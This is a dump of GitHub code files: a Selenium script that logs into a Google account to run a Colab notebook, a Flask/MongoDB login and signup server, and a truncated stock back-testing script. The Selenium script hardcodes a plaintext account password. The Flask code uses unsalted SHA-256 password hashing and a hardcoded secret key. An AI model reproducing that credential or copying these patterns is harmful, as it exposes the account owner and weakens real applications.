"alpha_fraction": 0.8725489974021912,
"alphanum_fraction": 0.8725489974021912,
"avg_line_length": 33.33333206176758,
"blob_id": "9a23a6616be2bd3556d900f9b532453808845570",
"content_id": "2cdb19a01d2de93baf13932a944982e6a9ac9b96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 3,
"path": "/get_stock_data/__init__.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "from pandas_datareader.stooq import StooqDailyReader\nfrom datetime import datetime\nimport pandas as pd"
},
{
"alpha_fraction": 0.6826608777046204,
"alphanum_fraction": 0.7099236845970154,
"avg_line_length": 29.11864471435547,
"blob_id": "e5617cb8dc5c1da62802ae9fefd4d109e548feff",
"content_id": "d85e319d7534e020b7d250032661607d1dc4c0d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1834,
"license_type": "no_license",
"max_line_length": 245,
"num_lines": 59,
"path": "/click_colab.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "import csv\r\nfrom selenium.webdriver import Chrome, ChromeOptions, Remote\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport lxml.html\r\nimport requests\r\nimport time\r\nimport re\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\n\r\ndef main():\r\n\ttry:\r\n\t\tmail_address = '[email protected]'\r\n\t\tpassword = 'hikaru0823'\r\n\r\n\t\t\r\n\t\toptions=ChromeOptions()\r\n\t\toptions.headless=True\r\n\t\t\r\n\t\toptions.add_argument('--user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0')\r\n\t\tdriver=Chrome(options=options)\r\n\t\t\r\n\r\n\t\turl = 'https://accounts.google.com/signin/v2/identifier?hl=ja&passive=true&continue=https%3A%2F%2Fwww.google.com%2Fwebhp%3Fhl%3Dja%26sa%3DX%26ved%3D0ahUKEwj9jtHspq3vAhUCEqYKHYZ4D84QPAgI&ec=GAZAmgQ&flowName=GlifWebSignIn&flowEntry=ServiceLogin'\r\n\t\tdriver.get(url)\r\n\t\t\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\telement = driver.switch_to.active_element\r\n\t\telement.send_keys(mail_address)\r\n\t\telement.send_keys(Keys.ENTER)\r\n\t\t#driver.find_element_by_id(\"identifierID\").send_keys(mail_address)\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\t\r\n\t\ttime.sleep(60)\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\tdriver.find_element_by_name(\"password\").send_keys(password)\r\n\t\tdriver.find_element_by_id(\"passwordNext\").click()\r\n\r\n\t\turl='https://colab.research.google.com/drive/1F18kintNY67aG_8LoOdnhuiQtLux7Pqw?usp=sharing'\r\n\r\n\t\tdriver.find_element_by_id(\"input\").send_keys(url)\r\n\t\tdriver.find_element_by_id(\"icon\").click()\r\n\t\t\r\n\t\t\r\n\r\n\t\t\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"runtime-menu-button\"]/div/div/div[1]').click()\r\n\t\tdriver.find_element_by_xpath('//*[@id=\":1w\"]/div').click()\r\n\t\tdriver.save_screenshot('click_colb.png')\r\n\t\tdriver.quit()\r\n\texcept:\r\n\t\tprint(\"error\")\r\n\t\timport traceback\r\n\t\ttraceback.print_exc()\r\n\t\tdriver.quit()\r\n\t\r\nif __name__==\"__main__\":\r\n\tmain()"
}
] | 4 |
Nirav8/Falsk_server
|
https://github.com/Nirav8/Falsk_server
|
b1f9ac7de1de16a91506a00a9dfe45b15ef117b9
|
f196abea99113a7089cb0f1f97d50aec16e6518e
|
32eddd0b556a7295b80025e7190aec89c3990b7e
|
refs/heads/master
| 2023-05-10T01:57:26.717338 | 2021-06-05T09:19:09 | 2021-06-05T09:19:09 | 370,787,398 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6227678656578064,
"alphanum_fraction": 0.625,
"avg_line_length": 24.571428298950195,
"blob_id": "dde8fd0c3acbe833b717f87848f912b489531655",
"content_id": "f72735c2bc2aa776cce45f2885284304d652378b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 896,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 35,
"path": "/apps/useraccount/model.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from apps import compare_hash, convert_hash\nfrom connection.mongoconnection import mongo\n\nusers = mongo.Login.users\n\n\"\"\"\nwe can implement hear for making it more convineant\nlike make possible with username too\n\"\"\"\ndef _isuser(email):\n user = users.find_one({'email' : email})\n return user\n\ndef _changepassword(new_pass , email):\n try:\n users.update_one({\"email\" : email} , {'$set' : {\"password\" : new_pass}})\n return 1\n except Exception as ex:\n return ex\n\ndef _changeusername(email , newusername):\n try:\n users.update_one({'email' : email} , {'$set' : {'username' : newusername}})\n return 1\n except Exception as ex:\n return ex\n\ndef _isusernameavailabe(username):\n try:\n if users.find_one({\"username\" : username}):\n return False\n else:\n return True\n except Exception as ex:\n return True\n\n"
},
{
"alpha_fraction": 0.5940330028533936,
"alphanum_fraction": 0.6068193912506104,
"avg_line_length": 30.81355857849121,
"blob_id": "6528ca8d2f1140bdf242ec1ea3fe184e2dedf3c2",
"content_id": "f76beb8b49ba27f2ff110f2258910f3a1047b0a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1877,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 59,
"path": "/apps/useraccount/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from pymongo.collection import ReturnDocument\nfrom apps import compare_hash, convert_hash, login_required\nfrom flask import Blueprint\nfrom flask.globals import request, session\nfrom flask.json import jsonify\n\nfrom .model import _isuser, _changepassword, _changeusername, _isusernameavailabe\n\nuseraccount = Blueprint('useraccount' , __name__)\n\[email protected](\"/logout\", methods = ['GET', 'POST'])\ndef logout():\n session.clear()\n return jsonify(),301\n \n\n#TODO create an decorator and make is secure\n#TODO maek template for changing password\n\[email protected](\"/changepassword\", methods=['GET', 'POST'])\n@login_required\ndef changepassword():\n if request.method == 'GET':\n return jsonify('comming soon'), 501\n elif request.method == 'POST':\n _json = request.json\n _email = _json['email']\n _user = _isuser(_email)\n \n if _user:\n _iscorrect = compare_hash(_user['password'], _json['password'])\n if _iscorrect:\n _ischanged = _changepassword(convert_hash(_json['new_password']), _email)\n if _ischanged:\n return jsonify({'message': 'changed'}), 200\n else:\n return jsonify(), 304\n else:\n return jsonify({'message' : 'password ios incorret'}), 451\n\[email protected](\"/changeusername\", methods=['GET' , 'POST'])\n@login_required\ndef changeusername():\n if request.method == 'GET':\n return jsonify(), 501\n\n elif request.method == 'POST':\n _json = request.json\n _username = _json['email']\n _newusername = _json['new_username']\n \n _isavailable = _isusernameavailabe(_newusername)\n\n if _isavailable:\n if _changeusername(_username, _newusername):\n return jsonify(), 204\n\n else:\n return jsonify(), 401\n"
},
{
"alpha_fraction": 0.47843942046165466,
"alphanum_fraction": 0.6817248463630676,
"avg_line_length": 15.233333587646484,
"blob_id": "46485fb1a4a1aaf5d2b1f5b26774d81d26892c80",
"content_id": "8fb05e55c12ac36dbeae126b900846bae3dba3d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 487,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 30,
"path": "/requirements.txt",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "aws==0.2.5\nbcrypt==3.2.0\nboto==2.49.0\ncachelib==0.1.1\ncffi==1.14.5\nclick==8.0.1\ncolorama==0.4.4\ncryptography==3.4.7\nfabric==2.6.0\nFlask==2.0.1\nFlask-Cors==3.0.10\nflask-redis==0.4.0\nFlask-Session==0.3.2\nimportlib-metadata==4.4.0\ninvoke==1.5.0\nitsdangerous==2.0.1\nJinja2==3.0.1\nMarkupSafe==2.0.1\nparamiko==2.7.2\npathlib2==2.3.5\nprettytable==2.1.0\npycparser==2.20\npymongo==3.11.4\nPyNaCl==1.4.0\nredis==3.5.3\nsix==1.16.0\ntyping-extensions==3.10.0.0\nwcwidth==0.2.5\nWerkzeug==2.0.1\nzipp==3.4.1\n"
},
{
"alpha_fraction": 0.556506872177124,
"alphanum_fraction": 0.5667808055877686,
"avg_line_length": 26.571428298950195,
"blob_id": "f1db02056fb37e0082d1cd7024801f1e64fbd2d1",
"content_id": "fb418e1aa79c2afda53d0edf8f3cd4cdbf683b8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 584,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 21,
"path": "/apps/signin/model.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from connection.mongoconnection import mongo\n\nusers = mongo.Login['users']\ntemp_user = mongo.Login['temp_users']\n\ndef _isuser(isemail, username):\n\n if isemail == True:\n _user = users.find_one({'email' : username})\n _temp = temp_user.find_one({'email' : username})\n if _temp:\n return '201'\n\n elif isemail == False:\n _user = users.find_one({'username' : username})\n _temp = temp_user.find_one({'username' : username})\n if _temp:\n return '201'\n \n a = users.find_one({'email' : 'namorgit [email protected]'})\n return _user\n\n "
},
{
"alpha_fraction": 0.6344195604324341,
"alphanum_fraction": 0.6384928822517395,
"avg_line_length": 26.30555534362793,
"blob_id": "51a97909bce18aecb96b5864127ab00dc9a96651",
"content_id": "6bad60afad2d84a7096538095871e7323044c95c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 36,
"path": "/apps/signup/model.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from bson.objectid import ObjectId\nfrom connection.mongoconnection import mongo\n\ntemp_user = mongo.Login.temp_users\nusers = mongo.Login.users\n\ndef _isuser(email , username):\n email = users.find_one({'email' : email})\n usename = users.find_one({'username' : username})\n if email != None or usename != None:\n return 1\n else:\n return 0\n\ndef _istempuser(email, username):\n tempemail = temp_user.find_one({'email' : email})\n tusername = temp_user.find_one({'username' : username})\n if tempemail != None or tusername != None:\n return 1\n else:\n return 0\n\ndef _insert(data):\n inserted = temp_user.insert_one(data)\n _new_id = inserted.inserted_id\n return _new_id\n\ndef _verifyuser(userid):\n user = temp_user.find_one({'_id' : ObjectId(userid)})\n user.pop('_id')\n try:\n temp_user.delete_one({'_id' : ObjectId(userid)})\n except Exception as ex:\n return ex\n added = users.insert_one(user)\n return added"
},
{
"alpha_fraction": 0.6536796689033508,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 20.090909957885742,
"blob_id": "47b4dbfcd9b5aee3c3a892916049be36ef52d447",
"content_id": "516971aeca7d5f6847348b4e762603722e73cf46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 11,
"path": "/connection/mongoconnection.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "import pymongo\nfrom pymongo import mongo_client\n\ntry:\n mongo = pymongo.MongoClient(\n host='localhost',\n port = 27017\n )\n print(mongo.server_info)\nexcept Exception as ex:\n print(\"database connection error\")"
},
{
"alpha_fraction": 0.7358490824699402,
"alphanum_fraction": 0.7509434223175049,
"avg_line_length": 27.648649215698242,
"blob_id": "962b03808ca127897c00a9da6d7aa6a17cfa5a9e",
"content_id": "6922206a6f3ac8d13ca94b2f5fef981d9e3faf0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1060,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 37,
"path": "/server.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask.globals import session\nfrom flask.helpers import url_for\nfrom flask_cors import CORS\nfrom flask_session import Session\nfrom flask_redis import FlaskRedis\nimport redis\n\nfrom apps.signin.views import login\nfrom apps.signup.views import signup\nfrom apps.useractivity.views import activity\nfrom apps.useraccount.views import useraccount\n\napp = Flask(__name__)\n\nredis = FlaskRedis(app)\n\napp.config['SESSION_TYPE'] = 'filesystem'\napp.config['SESSION_PERMANENT'] = False\n# app.config['SESSION_USE_SIGNER'] = True\napp.config['SECRET_KET'] = \"#22253%6DFvskleg$2%^7birsmgw77%55##\"\n# app.config['SESSION_REDIS'] = redis.from_url('redis://localhost:6379')\n\napp.register_blueprint(login , url_prefix = '/login')\napp.register_blueprint(signup , url_prefix = '/signup')\napp.register_blueprint(activity, url_prefix='/user')\napp.register_blueprint(useraccount, url_prefix='/account')\n\n#from cross platform\nCORS(app)\nSession(app)\n\nsession = Session()\n\nif __name__ =='__main__':\n session.init_app(app)\n app.run(debug=True,threaded= True)\n"
},
{
"alpha_fraction": 0.5252951383590698,
"alphanum_fraction": 0.5328836441040039,
"avg_line_length": 31.94444465637207,
"blob_id": "969a3ef1cb1304c327d05d45a75bd995df35ddc9",
"content_id": "f8672adfa0b248f599bd04af54ab7c04e50a31a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1186,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 36,
"path": "/apps/signin/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from apps import check_email, compare_hash\nfrom flask import Blueprint, request, render_template, redirect\nfrom flask.json import jsonify\nfrom .model import _isuser\nfrom flask import session\n\nlogin = Blueprint('login', __name__)\n\[email protected]('/user', methods =['GET' , 'POST'])\ndef Login():\n try:\n if request.method == 'GET':\n return render_template('login/login.html')\n\n elif request.method == 'POST':\n _json = request.json\n _username = _json['username']\n _isemail = check_email(_username)\n\n _user = _isuser(isemail = _isemail, username = _username)\n\n if _user == None:\n return jsonify(\"user not exist\"), 450\n\n else:\n __password = _json['password']\n _ans = compare_hash(_user['password'], __password)\n\n if _ans == True:\n session['_username'] = _username\n return jsonify({\"message\" : \"login sucsess fully\"}), 201\n\n else:\n return jsonify({'result': 'password is not correct'}), 451\n except Exception as ex:\n print(ex, \"**************************\")\n"
},
{
"alpha_fraction": 0.5518617033958435,
"alphanum_fraction": 0.563829779624939,
"avg_line_length": 19.29729652404785,
"blob_id": "933ec593a84f2c0074e40920d8fff90ad0c56a66",
"content_id": "da7b11e50988daacf2fa2bf15822d811549f9e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 752,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 37,
"path": "/apps/__init__.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "import re\nimport hashlib\nfrom flask import session\nfrom functools import wraps\n\nfrom flask.json import jsonify\n\nregex = '^(\\w|\\.|\\_|\\-)+[@](\\w|\\_|\\-|\\.)+[.]\\w{2,3}$'\n\n\ndef check_email(email):\n m = re.search(regex, email)\n if m:\n return True\n else:\n return False\n\ndef convert_hash(a):\n a = str(a)\n a = bytes(a, 'utf-8')\n return(hashlib.sha256(a).hexdigest())\n\ndef compare_hash(old,new):\n new = convert_hash(new)\n if old == new:\n return True\n else:\n return False\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if '_username' in session:\n return f(*args, **kwargs)\n else:\n return jsonify({\"message\": \"Login Requierd\"}), 401\n return wrap\n\n"
},
{
"alpha_fraction": 0.7253521084785461,
"alphanum_fraction": 0.7253521084785461,
"avg_line_length": 27.299999237060547,
"blob_id": "daec7743cf65157a35c3f870d307732f09c1875a",
"content_id": "efd8b4609e11fd354acbfb984d64036a6e36db1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 284,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/apps/useractivity/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, request\nfrom flask.json import jsonify\nfrom flask import session\n\nactivity = Blueprint('useractivity' , __name__)\n\[email protected]('/home', methods=['GET'])\ndef Home():\n print(request.headers['Cookie'])\n return jsonify('welcome to social connect')\n\n"
},
{
"alpha_fraction": 0.46464645862579346,
"alphanum_fraction": 0.47508418560028076,
"avg_line_length": 36.96154022216797,
"blob_id": "dc0f593595acb962fddc49d8f77b28b75368f7ab",
"content_id": "704066d614745066369dba332dade8f09a68510d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2970,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 78,
"path": "/apps/signup/views.py",
"repo_name": "Nirav8/Falsk_server",
"src_encoding": "UTF-8",
"text": "from flask import json\nfrom flask.templating import render_template\nfrom pymongo.message import _insert\nfrom apps import check_email, convert_hash\nfrom flask import Blueprint, redirect\nfrom flask.globals import request\nfrom flask.json import jsonify\nfrom .model import _istempuser, _insert, _isuser, _verifyuser\n\nsignup = Blueprint('signup' , __name__ )\n\[email protected]('/user', methods = ['GET' , 'POST'])\ndef create_user():\n if request.method == 'GET':\n return render_template('signup/signup.html')\n elif request.method == 'POST':\n try: \n _json = request.json\n _email = _json['email']\n _isemail = check_email(_email)\n _username = _json['username']\n\n if _isemail == False:\n return jsonify('not valid email')\n\n else:\n _tempuser = _istempuser(email = _email, username = _username)\n _user = _isuser(email = _email, username = _username)\n\n print(_tempuser, _user , \"********************************8\")\n\n if _user == 0 and _tempuser == 1:\n return jsonify({'result' : \"email allredy in used, please verify your email\"}),250\n \n\n elif _user == 1 and _tempuser == 0:\n return jsonify({\n \"message\" : \"you are allredy verifid\"\n }), 251\n\n elif _user == 1 and _tempuser == 1:\n return jsonify({\n \"message\" : \"username or email is allredy in used\"\n }), 252\n\n elif _user == 0 and _tempuser == 0:\n _password = _json['password']\n _password = convert_hash(_password)\n _userdata = {\n 'username': _username,\n \"email\": _email,\n \"password\": _password,\n }\n inserted = _insert(_userdata)\n #send email for verifying account\n\n # emailsending(_email, _name, \"http://localhost:9090/verify/{}?token={}\".format(_email, _token)) \n return jsonify({\n 'reult: ': \"User Created\",\n 'id' : str(inserted)\n }), 201\n except Exception as ex:\n print(\"***************************************************\")\n print(ex)\n print(\"***************************************************\")\n\[email protected](\"/verify/<userid>\", methods = ['GET' , 'POST'])\n\n#TODO:make decorator at hear\n#TODO :-crate gmail app for sending email and make a new temolate\n\ndef verify(userid):\n if request.method == 'GET':\n return jsonify(\"we have nothing yet,,,\"), 200\n elif request.method == 'POST':\n verified = _verifyuser(userid=userid)\n print(verified)\n return jsonify('verified'), 200\n \n\n"
}
] | 11 |
ramonpin/marmita-demo
|
https://github.com/ramonpin/marmita-demo
|
7e10f4d663f7c9b4e61ae560d9b79ba98c8b2a7a
|
48e1abaee890d7ae43c87db8719bb998b311ff00
|
9744539656af6b05a98a668aacef808473a4bbb2
|
refs/heads/main
| 2023-01-12T17:29:50.646828 | 2020-11-26T11:47:00 | 2020-11-26T16:24:11 | 314,317,275 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7001795172691345,
"alphanum_fraction": 0.7121484279632568,
"avg_line_length": 24.31818199157715,
"blob_id": "d915272e33d0f3e73e1eb96dd422ae4153bd5d70",
"content_id": "db6bd4a58d40c3b274097c03adcd82264eb1f449",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1671,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 66,
"path": "/README.md",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "## Marmita SDK Demo\nJust a demo of Scala -> Python integration.\n\n### Tooling\n\nTo work in this package is recomended to use `tox` python automation tool. You can install `tox` in your environment with:\n\n```bash\n$> python3 -m venv $HOME/.tox\n$> $HOME/.tox/bin/pip install tox==3.20.1\n$> ln -s $HOME/.tox/bin/tox $HOME/bin/tox\n```\n\nWhere you can replace `$HOME/bin` for any directory where you install your user tools (and is in your path).\n\nNow you can check it works with:\n\n```bash\n$> tox --version\n3.20.1 imported from /home/user/.tox/lib/python3.8/site-packages/tox/__init__.py\n```\n\n##### Development\n\nTo install the project in a virtualenv for development use:\n\n```bash\n$> tox --devenv <venv_dir> -e py<xx>\n```\n\nWhere `venv_dir` is the directory where you want to create the virtual environment and `xx` can be `36`, `37` or `38` \ndepending on your preference of python3 version.\n\nA `marmita-demo` script should be created and available in the path, pointing to the local project files.\nThe local installation only needs to be done again if the main method or the `setup.py` script changes.\n\nYou can run all tests and pass the linter check on all the available python3 versions at once with:\n\n```bash\n$> tox\n```\n\nOr you can just try one with:\n\n```bash\n$> tox -e py<xx>\n```\n\n##### Run demo script\n\nJust to try that the installation process works and that integration works properly you can try:\n\n```bash\n$> tox -qe run\n```\n\n##### Release as python wheel\n\nTo package for distribution, execute the following:\n\n```bash\n$> tox -e package\n```\n\nThe above command creates a `marmitasdk-<version>-py3-none-any.whl` executable at `dist` directory. This \nfile can be distributed.\n"
},
{
"alpha_fraction": 0.6914153099060059,
"alphanum_fraction": 0.7030162215232849,
"avg_line_length": 22.94444465637207,
"blob_id": "db3471fad86764d5c464555f9cd09ff388006642",
"content_id": "17d1dc8a1f6de1ab73128de2b74a214e3233d742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 18,
"path": "/src/marmitasdk/main.py",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "from loguru import logger\n\nimport marmitasdk.connector # noqa: F401\nfrom com.orange.marmita.registry.client import RegistryClient\n\n\ndef get_registry_handler(url, timestamp, timestamp_meta):\n return RegistryClient(url, timestamp, timestamp_meta)\n\n\ndef run():\n registry = get_registry_handler(\"url\", 0, 0)\n logger.info(\"Starting demo...\")\n logger.info(f\"With registry {registry}\")\n\n\nif __name__ == \"__main__\":\n run()\n"
},
{
"alpha_fraction": 0.7091836929321289,
"alphanum_fraction": 0.7346938848495483,
"avg_line_length": 27,
"blob_id": "4f1c5f5504314d61212d22168f6dddc03f02b7b7",
"content_id": "606329caed756fee980d65b340f116ea1ca3c316",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/tests/test_registry.py",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "import marmitasdk.connector # noqa: F401\nfrom marmitasdk.main import get_registry_handler\n\n\ndef test_registry():\n registry = get_registry_handler(\"url\", 0, 0)\n assert registry is not None\n"
},
{
"alpha_fraction": 0.6991150379180908,
"alphanum_fraction": 0.7053097486495972,
"avg_line_length": 29.54054069519043,
"blob_id": "bd8aac15252f19bd1d1e3060e1d923abf97a6759",
"content_id": "7e58ea75f007a3a5d8d1175850dbab4494caf7b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1130,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 37,
"path": "/src/marmitasdk/connector.py",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThis module extracts from main code the boilerplate code needed\nto boostrap JVM integration with jpype. It must be imported as\nthe first import for any module that uses JVM classes. To avoid\nlinter errors we must use:\n\n import connector # noqa FA403\n\nWith this the rest of the python code can be written in a\ncompletly standard way without warnings.\n\nWe are sure all code runs on the same JVM because python ensures\neach module is loaded just once.\n\"\"\"\nimport os\nfrom loguru import logger\n\nimport jpype\nimport jpype.imports\n\nif not jpype.isJVMStarted():\n logger.info(\"Initializing marmita connector...\")\n\n # Load needed jars from current dir\n _base = f\"{os.path.dirname(__file__)}\"\n _jars_dir = f\"{_base}/jars\"\n _jars = list(map(lambda f: f\"{_jars_dir}/{f}\", os.listdir(_jars_dir)))\n\n # Log ClassPath composition\n logger.info(\"ClassPath:\")\n for jar in _jars:\n logger.info(f\" {jar}\")\n\n # Bootstrap a JVM\n _jvmPath = jpype.getDefaultJVMPath()\n logger.info(f\"JVM used {_jvmPath}\")\n jpype.startJVM(_jvmPath, f\"-Dlog4j.configurationFile={_base}/log4j/log4j2.xml\", classpath=_jars)\n"
},
{
"alpha_fraction": 0.7104247212409973,
"alphanum_fraction": 0.7220077514648438,
"avg_line_length": 36,
"blob_id": "11ecc6527a528e83ad7ba93e30d511e21e6d0f60",
"content_id": "03625cf047feb2dc0591c380484a49acac518fcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 259,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 7,
"path": "/upgrade-jar.sh",
"repo_name": "ramonpin/marmita-demo",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nFEATURESTORE_REPO=${HOME}/development/feature-store\npushd \"${FEATURESTORE_REPO}\" >/dev/null || exit\n./gradlew --quiet build\n\npopd >/dev/null || exit\ncp \"${FEATURESTORE_REPO}\"/sdk/build/libs/sdk-0.1.0-SNAPSHOT-all.jar src/marmitasdk/jars/.\n"
}
] | 5 |
notptr/mass-file-extensions-renamer
|
https://github.com/notptr/mass-file-extensions-renamer
|
220074ff238b38ceaf54568100dfbaaf9e151e47
|
7355d13d4308aecd9afe7a59b8c598a9232614d2
|
68e7b07c2da3e67830d97d8ca9c8b226ab7d3690
|
refs/heads/master
| 2021-01-23T02:54:56.853449 | 2014-05-14T21:52:04 | 2014-05-14T21:52:04 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6235038042068481,
"alphanum_fraction": 0.6332970857620239,
"avg_line_length": 23.83783721923828,
"blob_id": "711c7eddd6a1f2dc90549321712f07e7537fa536",
"content_id": "ea6f6ba0d6e46a02a6c7e297f935845d1bccf220",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 37,
"path": "/rnmassfiles.py",
"repo_name": "notptr/mass-file-extensions-renamer",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#programmer Matthew Deig\n#idealy made for linux but it should work in windows by giving \\\\ instead\n\nimport os,glob,sys\n\ndef getdirlisting(path,ext):\n\treturn glob.glob(path+os.sep+\"*.\"+ext)\n\t\ndef changingExt(listing, ext, newext):\n\tfor filename in listing:\n\t\tnewfilename = filename.split(\".\")\n\t\t\n\t\tif newfilename[1] == ext:\n\t\t\tnewfilename[1] = \".\"+newext\n\t\t\tos.rename(filename,newfilename[0]+newfilename[1])\n\n\t\nif __name__ == \"__main__\":\n\tfilepath = \"\"\n\text = \"\"\n\tnewext = \"\"\n\tx=0\n\tfor args in sys.argv:\n\t\tif args == \"-p\" or args == \"--path\":\n\t\t\tfilepath = sys.argv[x+1]\n\t\telif args == \"-e\":\n\t\t\text = sys.argv[x+1]\n\t\telif args == \"-ne\":\n\t\t\tnewext = sys.argv[x+1]\n\t\tx+=1\n\t\t\t\n\tif filepath != \"\" and ext != \"\" and newext != \"\":\n\t\tlisting = getdirlisting(filepath,ext)\n\t\tchangingExt(listing, ext, newext)\n\telse:\n\t\tprint(\"usage -p for the path to the maps\\n-e is the old extension\\n-ne is the new extension\")\n"
}
] | 1 |
jiajunxiong/astock
|
https://github.com/jiajunxiong/astock
|
9a9f431f988d0f5d0665783b7f51fd1717afe135
|
b1969b66705199c4cded64fe224e5c51eaeeecaa
|
bd550b1736220bdf4f0178a920e1cd2599b229af
|
refs/heads/master
| 2020-03-23T11:38:48.746601 | 2018-07-19T02:26:50 | 2018-07-19T02:26:50 | 139,682,074 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6024433970451355,
"alphanum_fraction": 0.6164418458938599,
"avg_line_length": 34.08035659790039,
"blob_id": "03d49024930ede046d22cda4142fbdec50b3b203",
"content_id": "e7bbb8507ef54faddab90497fe460b12e255c1ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3929,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 112,
"path": "/sData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nshow back-testing result\n\"\"\"\nimport os\nimport csv\nimport math\nfrom rData import *\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nstock_num = 5\nholding_period = 2\ncapital = 10000\n\n# equal capital or equal lot\n# equal_capital_flag = True \n# equal_lot_flag = True\n\ndef transactionMTMDailyPnl(symbol, date_counter, lot, panel_data):\n \n transaction_pnl = 0.0\n \n today_close = panel_data.major_xs(symbol).CLOSE[date_counter] \n today_open = panel_data.major_xs(symbol).OPEN[date_counter]\n \n if not (math.isnan(today_close) or math.isnan(today_open)):\n transaction_pnl = (today_close - today_open) * lot\n return transaction_pnl\n \ndef priorperiodMTMDailyPnl_1(symbol, date_counter, panel_data):\n\n priorperiod_pnl = 0.0\n lot = 0\n \n today_open = panel_data.major_xs(symbol).OPEN[date_counter]\n today_close = panel_data.major_xs(symbol).CLOSE[date_counter] \n yesterday_close = panel_data.major_xs(symbol).CLOSE[date_counter-1]\n \n if not (math.isnan(today_close) or math.isnan(yesterday_close) or math.isnan(today_open)):\n lot = capital / today_open\n priorperiod_pnl = (today_close - yesterday_close) * lot\n return priorperiod_pnl, lot\n \ndef priorperiodMTMDailyPnl_2(symbol, date_counter, lot, panel_data):\n\n priorperiod_pnl = 0.0\n \n today_open = panel_data.major_xs(symbol).OPEN[date_counter]\n today_close = 